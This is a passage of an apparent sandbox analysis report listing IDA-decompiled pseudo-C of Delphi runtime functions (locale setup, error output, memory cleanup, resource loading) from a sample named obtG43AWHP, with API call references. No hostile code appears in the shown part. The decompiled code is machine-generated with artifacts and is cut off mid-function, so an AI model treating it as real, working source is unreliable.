    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0040A4A4, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 56
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x45308c; // 0x454044
				if( *_t14 == 0) {
					_t16 =  *0x452f6c; // 0x405f30
					_t9 = _t16 + 4; // 0xffe9
					_t18 =  *0x454660; // 0x400000
					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x452f90; // 0x454214
				E00402784(E00402A8C(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E00407764( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
			}












    0x0040a4b3
    0x0040a4b8
    0x0040a4c0
    0x0040a527
    0x0040a52c
    0x0040a530
    0x0040a53b
    0x00000000
    0x0040a551
    0x0040a4c2
    0x0040a4cc
    0x0040a4db
    0x0040a4eb
    0x0040a4fe
    0x00000000

    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00401A74, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62
    C-Code - Quality: 72%
    			E00401A74() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x4545bc == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401B4A);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L0040130C();
					}
					 *0x4545bc = 0;
					_t3 =  *0x45461c; // 0x0
					LocalFree(_t3);
					 *0x45461c = 0;
					_t19 =  *0x4545e4; // 0x4545e4
					while(_t19 != 0x4545e4) {
						_t1 = _t19 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000);
						_t19 =  *_t19;
					}
					E00401374(0x4545e4);
					E00401374(0x4545f4);
					E00401374(0x454620);
					_t14 =  *0x4545dc; // 0x0
					while(_t14 != 0) {
						 *0x4545dc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x4545dc; // 0x0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401b51);
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L00401314();
					}
					_push(0x4545c4);
					L0040131C();
					return 0;
				}
			}










    0x00401a75
    0x00401a7f
    0x00401b53
    0x00401a85
    0x00401a87
    0x00401a88
    0x00401a8d
    0x00401a90
    0x00401a9a
    0x00401a9c
    0x00401aa1
    0x00401aa1
    0x00401aa6
    0x00401aad
    0x00401ab3
    0x00401aba
    0x00401abf
    0x00401ad9
    0x00401ace
    0x00401ad2
    0x00401ad7
    0x00401ad7
    0x00401ae6
    0x00401af0
    0x00401afa
    0x00401aff
    0x00401b06
    0x00401b0a
    0x00401b11
    0x00401b16
    0x00401b1b
    0x00401b21
    0x00401b24
    0x00401b27
    0x00401b33
    0x00401b35
    0x00401b3a
    0x00401b3a
    0x00401b3f
    0x00401b44
    0x00401b49
    0x00401b49

    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0040B514, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40b7df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040B3A0();
				E00409E60(__ebx, __edi, __esi);
				_t196 =  *0x454744;
				if( *0x454744 != 0) {
					E0040A038(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E00409DB0(_t43, 0, 0x14,  &_v20);
				E00403EDC(0x454678, _v20);
				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00403EDC(0x454684, _v36);
				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00403EDC(0x454688, _v44);
				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
				E00403EDC(0x454690, _v52);
				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
				E00403EDC(0x454694, _v56);
				E00403E88( &_v12);
				E00403E88( &_v16);
				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
				_t104 = E00407174(0x40b7f4, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00403F20( &_v8, 0x40b84c);
				} else {
					E00403F20( &_v8, 0x40b840);
				}
				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
				_t111 = E00407174(0x40b7f4, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
					if(E00407174(0x40b7f4, 0, _t198) != 0) {
						E00403F20( &_v12, 0x40b868);
					} else {
						E00403F20( &_v16, 0x40b858);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404208();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404208();
				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040B7E6);
				return E00403EAC( &_v68, 0x10);
			}

























    0x0040b514
    0x0040b514
    0x0040b515
    0x0040b517
    0x0040b51c
    0x0040b51c
    0x0040b51e
    0x0040b520
    0x0040b520
    0x0040b523
    0x0040b526
    0x0040b527
    0x0040b52c
    0x0040b52f
    0x0040b532
    0x0040b537
    0x0040b53c
    0x0040b543
    0x0040b545
    0x0040b545
    0x0040b54f
    0x0040b55e
    0x0040b56b
    0x0040b580
    0x0040b58f
    0x0040b5a4
    0x0040b5b3
    0x0040b5c6
    0x0040b5d9
    0x0040b5ee
    0x0040b5fd
    0x0040b610
    0x0040b625
    0x0040b630
    0x0040b63d
    0x0040b652
    0x0040b65d
    0x0040b66a
    0x0040b67d
    0x0040b692
    0x0040b69f
    0x0040b6b4
    0x0040b6c1
    0x0040b6c9
    0x0040b6d1
    0x0040b6e6
    0x0040b6f0
    0x0040b6f5
    0x0040b6f7
    0x0040b710
    0x0040b6f9
    0x0040b701
    0x0040b701
    0x0040b725
    0x0040b72f
    0x0040b734
    0x0040b736
    0x0040b748
    0x0040b759
    0x0040b772
    0x0040b75b
    0x0040b763
    0x0040b763
    0x0040b759
    0x0040b777
    0x0040b77a
    0x0040b77d
    0x0040b782
    0x0040b78f
    0x0040b794
    0x0040b797
    0x0040b79a
    0x0040b79f
    0x0040b7ac
    0x0040b7bf
    0x0040b7c6
    0x0040b7c9
    0x0040b7cc
    0x0040b7de

    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0040DBC0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0040C5A0();
					return E0040D7EC(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0040C9F4();
						_t113 = _t54;
						if(_t113 == 0) {
							E0040D544(_t100);
						}
						E0040DB18(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0040DB34(_v788 - 1, _t115) != 0) {
								L0040CA0C();
								E0040D7EC(_v792);
								L0040CA0C();
								E0040D7EC( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0040DB64(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0040C9FC();
							E0040D7EC(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0040CA04();
							E0040D7EC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























    0x0040dbc0
    0x0040dbcc
    0x0040dbd2
    0x0040dbd4
    0x0040dbde
    0x0040dbe5
    0x0040dbe5
    0x0040dbea
    0x0040dbf8
    0x0040dd71
    0x0040dd78
    0x0040dd79
    0x00000000
    0x0040dbfe
    0x0040dc01
    0x0040dc13
    0x0040dc03
    0x0040dc08
    0x0040dc08
    0x0040dc22
    0x0040dc2e
    0x0040dc31
    0x0040dc9e
    0x0040dca4
    0x0040dca5
    0x0040dcab
    0x0040dcac
    0x0040dcae
    0x0040dcb3
    0x0040dcb7
    0x0040dcb9
    0x0040dcb9
    0x0040dcc4
    0x0040dccf
    0x0040dcda
    0x0040dce3
    0x0040dce6
    0x0040dd02
    0x0040dd09
    0x0040dd14
    0x0040dd2b
    0x0040dd30
    0x0040dd44
    0x0040dd49
    0x0040dd5c
    0x0040dd5c
    0x0040dd65
    0x0040dce8
    0x0040dce8
    0x0040dce9
    0x0040dcef
    0x0040dcf5
    0x0040dcf7
    0x0040dcf9
    0x0040dcfc
    0x0040dcff
    0x0040dcff
    0x0040dd02
    0x00000000
    0x00000000
    0x00000000
    0x0040dd02
    0x0040dc33
    0x0040dc33
    0x0040dc34
    0x0040dc36
    0x0040dc3c
    0x0040dc3e
    0x0040dc4d
    0x0040dc4e
    0x0040dc58
    0x0040dc59
    0x0040dc5e
    0x0040dc69
    0x0040dc6a
    0x0040dc74
    0x0040dc75
    0x0040dc7a
    0x0040dc95
    0x0040dc97
    0x0040dc98
    0x0040dc9b
    0x0040dc9b
    0x00000000
    0x0040dc3c
    0x0040dc31

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00403C90, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x454044 == 0) {
					if( *0x419030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
						 *0x454230();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
				}
			}





    0x00403c98
    0x00403cf8
    0x00403d08
    0x00403d08
    0x00403d0e
    0x00403c9a
    0x00403ca3
    0x00403cb3
    0x00403cb3
    0x00403ccf
    0x00403cf0
    0x00403cf0

    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0040B9A0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41
    C-Code - Quality: 100%
    			E0040B9A0() {
				struct HINSTANCE__** _t2;
				void* _t3;
				struct HINSTANCE__** _t5;
				struct HRSRC__* _t7;
				struct HINSTANCE__** _t8;
				intOrPtr* _t11;
				intOrPtr* _t12;
				struct HINSTANCE__* _t13;

				_t2 =  *0x452f9c; // 0x45402c
				if( *_t2 != 0) {
					_t5 =  *0x452f9c; // 0x45402c
					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
					_t8 =  *0x452f9c; // 0x45402c
					return LoadResource( *_t8, _t7);
				}
				_t3 = 0;
				_t11 =  *0x4530b8; // 0x419034
				_t12 =  *_t11;
				if(_t12 != 0) {
					while(1) {
						_t13 =  *(_t12 + 4);
						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
						if(_t3 != 0) {
							goto L5;
						}
						_t12 =  *_t12;
						if(_t12 != 0) {
							continue;
						}
						goto L5;
					}
				}
				L5:
				return _t3;
			}











    0x0040b9a3
    0x0040b9ab
    0x0040b9b4
    0x0040b9bc
    0x0040b9c2
    0x00000000
    0x0040b9ca
    0x0040b9d1
    0x0040b9d3
    0x0040b9d9
    0x0040b9dd
    0x0040b9df
    0x0040b9e8
    0x0040b9f3
    0x0040b9fa
    0x00000000
    0x00000000
    0x0040b9fc
    0x0040ba00
    0x00000000
    0x00000000
    0x00000000
    0x0040ba00
    0x0040b9df
    0x0040ba05
    0x0040ba05

    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00405945, Relevance: 9.0, APIs: 6, Instructions: 41
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
				 *0x419008 = 2;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454046 = 2;
				 *0x454000 = E00404B04;
				if(E00402F5C() != 0) {
					_t3 = E00402F8C();
				}
				E00403050(_t3);
				 *0x45404c = 0xd7b0;
				 *0x454218 = 0xd7b0;
				 *0x4543e4 = 0xd7b0;
				 *0x45403c = GetCommandLineA();
				 *0x454038 = E004012C0();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x4545b8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x454030 = _t11;
				return _t11;
			}





    0x00405945
    0x0040594a
    0x0040594f
    0x00405951
    0x00405958
    0x00405962
    0x0040596c
    0x00405973
    0x00405984
    0x00405986
    0x00405986
    0x0040598b
    0x00405990
    0x00405999
    0x004059a2
    0x004059b0
    0x004059ba
    0x004059ce
    0x00405a07
    0x004059d0
    0x004059de
    0x004059f6
    0x004059e0
    0x004059e0
    0x004059e0
    0x004059de
    0x00405a0c
    0x00405a11
    0x00405a16

    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0040A980, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 107
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40ab3b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x453064; // 0x405f58
					E00405824(_t52,  &_v8);
				} else {
					_t86 =  *0x453120; // 0x405f50
					E00405824(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x453068; // 0x405f00
					E00405824(_t60,  &_v372);
					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E004040F8( &_v340, 0x105,  &_v297);
					E00407660(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x4530a0; // 0x405ff8
					E00405824(_t82,  &_v344);
					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040AB42);
				E00403E88( &_v372);
				E00403EAC( &_v344, 3);
				return E00403E88( &_v8);
			}

































    0x0040a980
    0x0040a98d
    0x0040a993
    0x0040a999
    0x0040a99f
    0x0040a9a5
    0x0040a9aa
    0x0040a9ab
    0x0040a9b0
    0x0040a9b3
    0x0040a9b9
    0x0040a9c0
    0x0040a9d4
    0x0040a9d9
    0x0040a9c2
    0x0040a9c5
    0x0040a9ca
    0x0040a9ca
    0x0040a9de
    0x0040a9eb
    0x0040a9f7
    0x0040aab3
    0x0040aab9
    0x0040aac3
    0x0040aac9
    0x0040aad0
    0x0040aad6
    0x0040aaec
    0x0040aaf1
    0x0040ab03
    0x0040aa1a
    0x0040aa1d
    0x0040aa23
    0x0040aa3b
    0x0040aa4c
    0x0040aa57
    0x0040aa5d
    0x0040aa67
    0x0040aa6d
    0x0040aa74
    0x0040aa7a
    0x0040aa90
    0x0040aa95
    0x0040aaa7
    0x0040aaac
    0x0040ab0c
    0x0040ab0f
    0x0040ab12
    0x0040ab1d
    0x0040ab2d
    0x0040ab3a

    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0040A31C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
